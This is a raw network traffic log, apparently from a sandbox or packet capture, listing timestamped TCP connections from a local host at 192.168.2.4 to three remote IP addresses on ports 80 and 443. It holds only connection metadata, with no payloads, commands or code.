Apr 29, 2024 01:03:02.364171028 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.364612103 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.364742041 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.365859032 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.366106987 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.403707027 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.474375963 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.474839926 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.475008965 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.513667107 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.513773918 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.513948917 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.584852934 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.623503923 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.623963118 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.624131918 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.774333954 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.885508060 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.885535955 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.885620117 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.014203072 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.014230013 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.014312983 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.158569098 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.158622980 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.178668022 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.269496918 CEST	80	49766	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.269939899 CEST	80	49765	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.270117044 CEST	49766	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.270143986 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.289144993 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.290142059 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.290281057 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.400671005 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.400918961 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.404149055 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:03.555517912 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.801043034 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.801089048 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:03.801146030 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.469837904 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.506145954 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.527976036 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.580903053 CEST	80	49767	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.580976963 CEST	49767	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.582250118 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:06.582318068 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:06.582413912 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:06.585522890 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:06.585551023 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:06.616277933 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.616334915 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.616455078 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.638607025 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.638674021 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.638767004 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.726191044 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.726558924 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.726807117 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.749003887 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.749252081 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.749391079 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.810740948 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:06.810821056 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:06.813555002 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:06.813581944 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:06.813839912 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:06.836627007 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.836657047 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.836689949 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.836721897 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.836782932 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.836827040 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.836860895 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.836903095 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.861974955 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:06.877906084 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.877958059 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.899879932 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.908121109 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:06.946516991 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946557045 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946590900 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946624041 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946655989 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946686983 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.946687937 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946712971 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.946722984 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946743965 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.946757078 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946768045 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.946799994 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.946839094 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946872950 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.946882010 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.946909904 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:06.987703085 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:06.987787962 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.047396898 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.047461987 CEST	443	49770	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.047508955 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.048058987 CEST	49770	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.048984051 CEST	49771	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.049076080 CEST	443	49771	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.049078941 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.049151897 CEST	49771	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.049388885 CEST	49771	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.049410105 CEST	443	49771	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.056596994 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.056655884 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.056683064 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.056718111 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.056730032 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.056770086 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.056979895 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057017088 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057030916 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057069063 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057091951 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057132959 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057225943 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057259083 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057265997 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057293892 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057348967 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057389021 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057380915 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057435036 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057528019 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057562113 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057566881 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057594061 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057600021 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057629108 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057636023 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057662964 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057666063 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057702065 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057709932 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057742119 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057749033 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057774067 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057780027 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057806015 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057812929 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057840109 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057843924 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057873964 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057877064 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057904959 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.057915926 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057941914 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.057986021 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.058017969 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.058024883 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.058049917 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.058058023 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.058088064 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.097501993 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.097537041 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.097549915 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.097582102 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.097652912 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.097685099 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.097697973 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.097719908 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.148643017 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.148683071 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.148701906 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.148726940 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.160545111 CEST	80	49769	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.160590887 CEST	49769	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166466951 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166522026 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166522026 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166574955 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166578054 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166610956 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166616917 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166651011 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166704893 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166738033 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166748047 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166770935 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.166774035 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.166809082 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167088032 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167120934 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167129993 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167152882 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167157888 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167192936 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167717934 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167763948 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167870045 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167901993 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167922020 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167933941 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.167948961 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167972088 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.167973042 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168006897 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168009043 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168040991 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168045998 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168076038 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168083906 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168112040 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168126106 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168158054 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168168068 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168196917 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168272972 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168314934 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168432951 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168463945 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168472052 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168495893 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168503046 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168529987 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168535948 CEST	49768	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.168606043 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168637991 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168669939 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168700933 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168732882 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168804884 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168837070 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168868065 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168898106 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.168927908 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169239044 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169270039 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169301033 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169331074 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169362068 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169393063 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169425011 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169456005 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169487953 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169518948 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169549942 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169579983 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169610023 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169759035 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.169790983 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.202352047 CEST	49772	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.207263947 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.207297087 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.207420111 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.207452059 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.207530975 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.207634926 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.207667112 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.273612976 CEST	443	49771	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.274986029 CEST	49771	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.275048971 CEST	443	49771	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.276433945 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276484013 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276515961 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276547909 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276581049 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276612997 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276765108 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276813984 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.276845932 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277034998 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277066946 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277097940 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277129889 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277178049 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277223110 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277255058 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277287006 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277362108 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277431011 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277551889 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277585983 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277837992 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277895927 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.277978897 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278013945 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278122902 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278234959 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278417110 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278573990 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278605938 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278639078 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278691053 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278723955 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.278825045 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279010057 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279314995 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279345989 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279376984 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279444933 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279541969 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279573917 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279620886 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279653072 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279684067 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279716015 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279747963 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279778004 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279808044 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279840946 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279871941 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.279993057 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.280025959 CEST	80	49768	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.312077999 CEST	80	49772	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.312158108 CEST	49772	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.312264919 CEST	49772	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.421937943 CEST	80	49772	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.423242092 CEST	80	49772	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.423441887 CEST	49772	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.513459921 CEST	443	49771	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.513644934 CEST	443	49771	34.117.186.192	192.168.2.4
Apr 29, 2024 01:03:07.513721943 CEST	49771	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.514241934 CEST	49771	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:03:07.516518116 CEST	49772	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.541611910 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:07.541670084 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:07.541747093 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:07.543071032 CEST	49773	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:03:07.543109894 CEST	443	49773	149.154.167.220	192.168.2.4
Apr 29, 2024 01:03:07.573489904 CEST	80	49772	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.627001047 CEST	80	49772	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.628010988 CEST	49772	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.641093016 CEST	49774	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.750758886 CEST	80	49774	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:07.751029015 CEST	49774	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:07.751200914 CEST	49774	80	192.168.2.4	172.67.144.153
